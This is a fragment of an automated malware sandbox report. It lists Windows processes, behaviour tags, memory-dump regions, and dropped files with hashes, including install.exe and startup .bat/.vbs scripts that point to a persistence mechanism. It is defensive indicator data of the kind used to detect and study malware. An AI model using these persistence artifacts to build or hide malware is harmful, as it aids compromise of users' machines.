C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
- Drops file in System32 directory
-
C:\Windows\sysWOW64\wbem\wmiprvse.exeC:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
2KB
MD55dc9a9599fb11ee70f9164d8fea15abf
SHA185faf41a206f3fa8b469609333558cf817df2cda
SHA2563f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de
SHA512499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
17KB
MD51671cda496fb05c15e99fbc7cce9c117
SHA1009e18567d5cba84b0274969556525a4423e74b2
SHA2562ab5c4448716de8b7649fb7961536c5aa0a2c89105ecef9a413dc060644dfa59
SHA512c71053fdd3cd73905cf7b8ae9b2fd24ef8832afee770b162d55244eaef2da98d3c8a76630b961e6d83ec4d0b737a7fa16c094077571e1775b8386a97ee2b6501
-
C:\Users\Admin\AppData\Local\Temp\7usMH6hRYQjS.batFilesize
276B
MD5caa3a2ed2f93963692d29b4924b107af
SHA18248bb3ed5e11295303987f0a9dc9bff059d65df
SHA2565d6cecdb92dec3252e9237e253448b064f4e1a20b143be8f5dc2a33ca1eea0db
SHA512446dceff78ddb792aec5239cc7bf9d4de3afe6874eb550f4e3c541d254d1007376e38e2879b14110dc295d811dea1de96e14bc74057cf74c0e0544a8b606d26e
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0w35wpu.wg5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\$SXR-LOGS\05-14-~1Filesize
224B
MD50e56f16dad794e44f6100ab42ebf6767
SHA1f8429757596b51ffafac9d842be2a9d4036683c1
SHA2566ca8c2677cf64ea367acc10e9ac608bfc8e232d8a7629fec17b5b44b2427d554
SHA51219931730dc94978e4c27f1886836b2e50fea265209e6d8dda5a39d0c345ae72a9c9c71756ea17dcd1e8e8d89985b3db475cd3a6e87642c62eeb9ff44eeed2a57
-
C:\Users\Admin\AppData\Roaming\startup_str_937.batFilesize
513KB
MD5a84be587721ab2558489178539f283e6
SHA15a48f5c98f7366d13f371965c19c98a5754bd90b
SHA25632cfb4e83f43787c79ef6a15bef53137a0e9a6d6d558ef1532993fb8369cc8fd
SHA512c1c4e35246c39f3e710cbd261187c7968d75c65fd1c4b96f6caa6ddec1484ca42f2431f4184ec0061cd7b2e0d3478db993f88a043106f0ce9d7ae859c3f5f931
-
C:\Users\Admin\AppData\Roaming\startup_str_937.vbsFilesize
115B
MD531ac93556d45bd5c7cda7de15c644174
SHA19c244354242c78b753d64c22bfb2ad5a8085ddc9
SHA256642d1de104dad1181474117b26e8b04dccd3726e217bcfeeba3ec1995485aae1
SHA51281a40b94453357af856ad29253ba61b6df35ee5b798f2a2ee8fc15ca11eff67de208b51cdc740e62b81c451ec8041602d6a53c50df911dd0c82640d6428283e4
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157Filesize
302B
MD5583512c128046c1731f9e43f1f8d99c6
SHA15e1de015d4ecda4860d83e0ab74c813bee4091c9
SHA2564d93e3f7239a3cf3191420807731ed3f8482ccea1b1f0b960ce152a84b17ef98
SHA5123ea0cdc6d55519bcc612c108ab6fc7bd88b75c2da41e4566869ecee5f6845f661341be19fbb66c8d81d1f99282e2fd5cb9dfdc487512a9ead26ca990aa54b368
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Filesize
412B
MD52176fe5eac80179554ec74b8ae6ad885
SHA16a5ecaffbfc964d569b331f5c932f6e9c25984c0
SHA256b075c4dc0f8f094ae23de699893f912bbbee9597a1abe973997c146194bcee86
SHA512ed684a023f18f7277b428e39d3d96ad7e4f427a28f627d741fa3be60828a9b9b57200606ae807bc425bcdde2fa54a8f96d1ef1347d2b631f303964ae28d60c54
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.logFilesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5bb7d9cd87343b2c81c21c7b27e6ab694
SHA127475110d09f1fc948f1d5ecf3e41aba752401fd
SHA256b06963546e5a36237a9061b369789ebdfc6578c4adfbb3ad425a623ffd2518df
SHA512bf6e222412df3e8fb28fbdd2247628b85ed5087d7be94fa77577a45d02c5f929f20d572867616f1761c86a81e0769d63be5a4e737975c7e7ebc2ef9dccae9a0b
-
memory/548-153-0x00007FFC99250000-0x00007FFC99260000-memory.dmpFilesize
64KB
-
memory/548-146-0x0000013449200000-0x000001344922B000-memory.dmpFilesize
172KB
-
memory/548-152-0x0000013449200000-0x000001344922B000-memory.dmpFilesize
172KB
-
memory/648-118-0x00007FFC99250000-0x00007FFC99260000-memory.dmpFilesize
64KB
-
memory/648-117-0x00000205D4B40000-0x00000205D4B6B000-memory.dmpFilesize
172KB
-
memory/648-111-0x00000205D4B40000-0x00000205D4B6B000-memory.dmpFilesize
172KB
-
memory/648-110-0x00000205D4B40000-0x00000205D4B6B000-memory.dmpFilesize
172KB
-
memory/648-109-0x00000205D4B10000-0x00000205D4B35000-memory.dmpFilesize
148KB
-
memory/704-122-0x0000019E76FD0000-0x0000019E76FFB000-memory.dmpFilesize
172KB
-
memory/704-129-0x00007FFC99250000-0x00007FFC99260000-memory.dmpFilesize
64KB
-
memory/704-128-0x0000019E76FD0000-0x0000019E76FFB000-memory.dmpFilesize
172KB
-
memory/772-157-0x0000026473690000-0x00000264736BB000-memory.dmpFilesize
172KB
-
memory/996-141-0x000001C8B5340000-0x000001C8B536B000-memory.dmpFilesize
172KB
-
memory/996-142-0x00007FFC99250000-0x00007FFC99260000-memory.dmpFilesize
64KB
-
memory/996-135-0x000001C8B5340000-0x000001C8B536B000-memory.dmpFilesize
172KB
-
memory/1264-35-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-52-0x0000000007440000-0x00000000074D6000-memory.dmpFilesize
600KB
-
memory/1264-53-0x00000000073D0000-0x00000000073E1000-memory.dmpFilesize
68KB
-
memory/1264-54-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-57-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-51-0x0000000007230000-0x000000000723A000-memory.dmpFilesize
40KB
-
memory/1264-50-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-49-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-37-0x0000000070E70000-0x0000000070EBC000-memory.dmpFilesize
304KB
-
memory/1264-47-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-25-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-26-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/1264-36-0x0000000007040000-0x0000000007074000-memory.dmpFilesize
208KB
-
memory/1264-48-0x0000000007080000-0x0000000007124000-memory.dmpFilesize
656KB
-
memory/1264-46-0x0000000007020000-0x000000000703E000-memory.dmpFilesize
120KB
-
memory/1876-91-0x00000224F1390000-0x00000224F13B2000-memory.dmpFilesize
136KB
-
memory/1876-95-0x00000224F1750000-0x00000224F177A000-memory.dmpFilesize
168KB
-
memory/1876-97-0x00007FFCD7BC0000-0x00007FFCD7C7D000-memory.dmpFilesize
756KB
-
memory/1876-96-0x00007FFCD91C0000-0x00007FFCD93C9000-memory.dmpFilesize
2.0MB
-
memory/3564-106-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-98-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-104-0x00007FFCD91C0000-0x00007FFCD93C9000-memory.dmpFilesize
2.0MB
-
memory/3564-105-0x00007FFCD7BC0000-0x00007FFCD7C7D000-memory.dmpFilesize
756KB
-
memory/3564-103-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-101-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-100-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3564-99-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/3720-79-0x00000000081F0000-0x000000000822C000-memory.dmpFilesize
240KB
-
memory/3720-76-0x0000000007C10000-0x0000000007CA2000-memory.dmpFilesize
584KB
-
memory/3720-78-0x0000000007D10000-0x0000000007D22000-memory.dmpFilesize
72KB
-
memory/3720-75-0x0000000007AC0000-0x0000000007B2C000-memory.dmpFilesize
432KB
-
memory/3720-85-0x0000000008240000-0x000000000824A000-memory.dmpFilesize
40KB
-
memory/4496-18-0x0000000006080000-0x00000000060CC000-memory.dmpFilesize
304KB
-
memory/4496-6-0x00000000053D0000-0x0000000005436000-memory.dmpFilesize
408KB
-
memory/4496-22-0x00000000071F0000-0x0000000007252000-memory.dmpFilesize
392KB
-
memory/4496-21-0x0000000000E50000-0x0000000000E58000-memory.dmpFilesize
32KB
-
memory/4496-20-0x00000000065C0000-0x00000000065DA000-memory.dmpFilesize
104KB
-
memory/4496-19-0x0000000007820000-0x0000000007E9A000-memory.dmpFilesize
6.5MB
-
memory/4496-77-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/4496-17-0x0000000005FD0000-0x0000000005FEE000-memory.dmpFilesize
120KB
-
memory/4496-16-0x0000000005B10000-0x0000000005E67000-memory.dmpFilesize
3.3MB
-
memory/4496-23-0x0000000008EA0000-0x0000000009446000-memory.dmpFilesize
5.6MB
-
memory/4496-0-0x0000000074C8E000-0x0000000074C8F000-memory.dmpFilesize
4KB
-
memory/4496-7-0x0000000005440000-0x00000000054A6000-memory.dmpFilesize
408KB
-
memory/4496-5-0x0000000005230000-0x0000000005252000-memory.dmpFilesize
136KB
-
memory/4496-4-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/4496-3-0x0000000074C80000-0x0000000075431000-memory.dmpFilesize
7.7MB
-
memory/4496-2-0x00000000054E0000-0x0000000005B0A000-memory.dmpFilesize
6.2MB
-
memory/4496-1-0x0000000002C50000-0x0000000002C86000-memory.dmpFilesize
216KB